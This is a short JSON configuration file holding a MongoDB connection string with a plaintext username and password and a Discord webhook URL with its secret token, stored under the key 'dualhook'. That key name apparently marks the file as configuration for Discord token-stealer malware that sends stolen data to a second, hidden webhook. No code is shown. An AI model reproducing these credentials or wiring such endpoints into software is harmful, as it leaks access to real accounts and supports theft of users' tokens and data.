{
    "embed-color": 3158071,
    "session": {
        "database": "mongodb+srv://bloody:ilio1324@fakie.wodxgyf.mongodb.net/?retryWrites=true&w=majority",
        "dualhook": "https://discord.com/api/webhooks/1114368552082866268/p-ESUeZmn2SsMdtAI9J8a6Vhoo7XtisycjdOCu3lj6vCeAIB5PjSXCIfAKFwt8tL_z4X"
    }
}